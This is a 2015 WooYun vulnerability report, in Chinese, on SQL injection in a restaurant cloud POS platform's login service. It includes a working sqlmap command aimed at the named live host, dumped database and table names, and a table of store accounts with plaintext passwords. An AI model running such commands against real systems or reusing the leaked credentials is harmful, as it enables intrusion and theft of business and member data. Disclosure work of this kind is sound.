当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-089914

漏洞标题:某通用型餐饮业云pos管理平台sa权限注入(泄露大量账户信息)

相关厂商:上海赫思缔亚信息科技有限公司

漏洞作者: JulyTornado

提交时间:2015-01-04 15:28

修复时间:2015-04-04 15:30

公开时间:2015-04-04 15:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-01-04: 细节已通知厂商并且等待厂商处理中
2015-01-09: 厂商已经确认,细节仅向厂商公开
2015-01-12: 细节向第三方安全合作伙伴开放
2015-03-05: 细节向核心白帽子及相关领域专家公开
2015-03-15: 细节向普通白帽子公开
2015-03-25: 细节向实习白帽子公开
2015-04-04: 细节向公众公开

简要描述:

年輕人多讀書,不要那麼浮誇,無關的內容太多了,大量门店销售及会员信息,走应急吧。。。

详细说明:

首页.png


sqlmap -u "http://cpos168.com/Service.asmx/TryLogin" --data="username=admin&password=admin" -pusername --current-user --is-dba


sqlmap证明.png


sqlmap证明1.png

漏洞证明:

available databases [73]:
[*] cloudmenu
[*] CloudPOS_AnDongNi
[*] CloudPOS_Ayi
[*] CloudPOS_BaiWeiGuo
[*] CloudPOS_BaLiBaLi
[*] CloudPOS_BingTeLiCoffee
[*] CloudPOS_BolangCoffee
[*] CloudPOS_Cduoduo
[*] CloudPOS_ChaTime
[*] CloudPOS_Chatime_TW
[*] CloudPOS_Config_1
[*] CloudPOS_Demo_Baking
[*] CloudPOS_Demo_Drink
[*] CloudPOS_Demo_Pizza
[*] CloudPOS_Demo_Steak
[*] CloudPOS_FeiNiMoShu
[*] CloudPOS_ganjiangcun
[*] CloudPOS_GFresh_Cartoony
[*] CloudPOS_HaoDaDa
[*] CloudPOS_Hestia
[*] CloudPOS_HongPeiDaShi
[*] CloudPOS_Houxia_20120209
[*] CloudPOS_HuangJiaJiPai
[*] CloudPOS_HuoYuanJia
[*] CloudPOS_HuZaiShan_TW
[*] CloudPOS_Ireland_TW
[*] CloudPOS_JiDong
[*] CloudPOS_Jifentian
[*] CloudPOS_JiPaiChaoRen
[*] CloudPOS_Kongpeisi
[*] CloudPOS_KuBi
[*] CloudPOS_LanZhouJunHe
[*] CloudPOS_LaoTeng_TW
[*] CloudPOS_LeCai
[*] CloudPOS_LiuYiShou
[*] CloudPOS_London8shi
[*] CloudPOS_maishengli
[*] CloudPOS_Maldives_TW
[*] CloudPOS_Member
[*] CloudPOS_MianMianJuDao
[*] CloudPOS_NanFeiMilkTea
[*] CloudPOS_Peidu
[*] CloudPOS_Possmei_20120212
[*] CloudPOS_R_B
[*] CloudPOS_RBYiShi_TW
[*] CloudPOS_RoyalHost
[*] CloudPOS_SanChong_TW
[*] CloudPOS_Shalisha_TW
[*] CloudPOS_ShangJin
[*] CloudPOS_ShaXian
[*] CloudPOS_TBFengQing
[*] CloudPOS_Tosca_TW
[*] CloudPOS_UrbanPark_TW
[*] CloudPOS_WeiQun_TW
[*] CloudPOS_Wuchadao
[*] CloudPOS_XiKe
[*] CloudPOS_XindaoCoffee
[*] CloudPOS_XXCha_TW
[*] CloudPOS_Yadianna
[*] CloudPOS_YaMiPiSa
[*] CloudPOS_YangXinDian_TW
[*] CloudPOS_YangXinDianTemp_TW
[*] CloudPOS_YingTao
[*] CloudPOS_Yuanjiangjun
[*] CloudPOS_YuanShiZu
[*] CloudPOS_ZhaoTianQu
[*] CloudPOS_ZhongLiang
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
Database: CloudPOS_Member
[28 tables]
+-------------------+
| Account           |
| BGroupSAT         |
| BSATFunction      |
| Brand             |
| BrandGroup        |
| CBasicData        |
| CFunction         |
| CLevel            |
| Card              |
| CardExtension     |
| DRuleEx_1         |
| DeductRule        |
| DeductRule_1      |
| FormatApplication |
| FormatBatch       |
| FormatBatch_View  |
| FormatTemplate    |
| Log               |
| Member            |
| MemberExpand      |
| Member_View       |
| RRuleEx           |
| RechargeRule      |
| Record            |
| SATFunction       |
| SubAccount        |
| SubAccount_Type   |
| TemplateFunction  |
+-------------------+
Database: CloudPOS_HongPeiDaShi
[159 tables]
+------------------------+
| Area                   |
| Attendance             |
| BProduct               |
| BProduct_View          |
| BasicData              |
| CashRegister           |
| CheckOut               |
| CheckOutApr            |
| CheckOutAug            |
| CheckOutBill           |
| CheckOutDec            |
| CheckOutEed            |
| CheckOutFeb            |
| CheckOutJan            |
| CheckOutJul            |
| CheckOutJun            |
| CheckOutMar            |
| CheckOutMay            |
| CheckOutNov            |
| CheckOutOct            |
| CheckOutSep            |
| Client                 |
| ClientStatus           |
| Desktop                |
| DocumentFormat         |
| Employee               |
| ExpandData             |
| Feeding                |
| FloorArea              |
| Functions              |
| GiftCertificate        |
| GiftCertificateDetail  |
| GroupData              |
| GroupFunction          |
| Groups                 |
| Headquarters           |
| Instruction            |
| InvoiceDetail          |
| InvoiceDetailApr       |
| InvoiceDetailAug       |
| InvoiceDetailDec       |
| InvoiceDetailFeb       |
| InvoiceDetailJan       |
| InvoiceDetailJul       |
| InvoiceDetailJun       |
| InvoiceDetailMar       |
| InvoiceDetailMay       |
| InvoiceDetailNov       |
| InvoiceDetailOct       |
| InvoiceDetailSep       |
| KeyFunction            |
| Log                    |
| Machine                |
| MachineBill            |
| ManualInvoice          |
| Module                 |
| OrderCustomer          |
| OrderDetail            |
| OrderDetailApr         |
| OrderDetailAug         |
| OrderDetailDec         |
| OrderDetailEnd         |
| OrderDetailFeb         |
| OrderDetailJan         |
| OrderDetailJul         |
| OrderDetailJun         |
| OrderDetailMar         |
| OrderDetailMay         |
| OrderDetailNov         |
| OrderDetailOct         |
| OrderDetailSep         |
| OrderInformation       |
| OrderInformationApr    |
| OrderInformationAug    |
| OrderInformationDec    |
| OrderInformationEnd    |
| OrderInformationFeb    |
| OrderInformationJan    |
| OrderInformationJul    |
| OrderInformationJun    |
| OrderInformationMar    |
| OrderInformationMay    |
| OrderInformationNov    |
| OrderInformationOct    |
| OrderInformationSep    |
| OrderMealEnd           |
| OrderRecord            |
| OrderSubMeal           |
| OrderSubMealApr        |
| OrderSubMealAug        |
| OrderSubMealDec        |
| OrderSubMealFeb        |
| OrderSubMealJan        |
| OrderSubMealJul        |
| OrderSubMealJun        |
| OrderSubMealMar        |
| OrderSubMealMay        |
| OrderSubMealNov        |
| OrderSubMealOct        |
| OrderSubMealSep        |
| OrderTable             |
| OrderingRecord         |
| PTemplate              |
| Payment                |
| PaymentDetail          |
| PaymentDetailApr       |
| PaymentDetailAug       |
| PaymentDetailDec       |
| PaymentDetailEnd       |
| PaymentDetailFeb       |
| PaymentDetailJan       |
| PaymentDetailJul       |
| PaymentDetailJun       |
| PaymentDetailMar       |
| PaymentDetailMay       |
| PaymentDetailNov       |
| PaymentDetailOct       |
| PaymentDetailSep       |
| PaymentType            |
| PickupBill             |
| PickupCustomer         |
| Printer                |
| Product                |
| ProductCategory        |
| ProductCategoryFeeding |
| ProductCategorySubMeal |
| ProductCategoryTaste   |
| ProductExpand          |
| ProductFeeding         |
| ProductStore           |
| ProductSubMeal         |
| ProductTaste           |
| Promotion              |
| PromotionType          |
| PunchCard              |
| RegistrationKey        |
| Rule                   |
| RuleContent            |
| RuleTemplate           |
| STemplate              |
| Shift                  |
| Store                  |
| StoreDailyReport       |
| StoreSet               |
| StoreSetStore          |
| SubMealGroup           |
| SystemSetting          |
| TableVersion           |
| TakeOutCustomer        |
| Taste                  |
| Template               |
| TemplateData           |
| TemporaryCustomer      |
| TotalOrder             |
| UserFunction           |
| UserGroup              |
| Users                  |
| VATTax                 |
| VTemplate              |
+------------------------+
Database: CloudPOS_HongPeiDaShi
Table: Users
[9 entries]
+--------------------------------------+----------------+----------+------------+--------
--------+----------------------+-----------------+
| Users_ID                             | Users_Store_ID | Users_NO | Users_Name | 
Users_IsEnable | Users_Password       | Users_LoginName |
+--------------------------------------+----------------+----------+------------+--------
--------+----------------------+-----------------+
| 122D438F-00B4-456B-A1CE-D4D9E2DE54ED | NULL           | ZJ01     | 张江店        | 1     
         | 123456               | ZJ01            |
| 4731D671-18E8-4D7A-AA86-3B602D0BC8D1 | NULL           | JQ01     | 金桥店        | 1     
         | JQ01                 | JQ01            |
| 7116B31C-623C-4548-AA2C-871378628267 | NULL           | YZ01     | 扬州店        | 1     
         | YZ01                 | YZ01            |
| A01824FC-DD30-46D1-A2E9-30D58AC90D6F | NULL           | AD001    | 管理员        | 1     
         | 123                  | hpds            |
| B5151D7F-443B-4634-961E-31B3205CEFC8 | NULL           | YX01     | 意翔店        | 1     
         | YX01                 | YX01            |
| C35FAF03-E28E-4481-B137-FF472D855E3C | NULL           | LY01     | 柳营店        | 1     
         | LY01                 | LY01            |
| C7E5814C-BCBA-4318-8B0E-7EB866E5E35B | NULL           | 01       | test01     | 1        
      | test                 | test01          |
| E5452673-09DC-4CAE-80D2-93DC2BF1FD49 | NULL           | JJ01     | 靖江店        | 1     
         | JJ01                 | JJ01            |
| E73D221A-D618-443F-9AE8-19B326074203 | NULL           | SD01     | 江阴时代店      | 1   
           | SD01                 | SD01            |
+--------------------------------------+----------------+----------+------------+--------
--------+----------------------+-----------------+


会员卡.png


会员卡1.png


10000条数据.png

修复方案:

过滤。。。

版权声明:转载请注明来源 JulyTornado@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-01-09 13:43

厂商回复:

CNVD确认所述漏洞情况,暂未建立与软件生产厂商的直接处置渠道,待认领。

最新状态:

暂无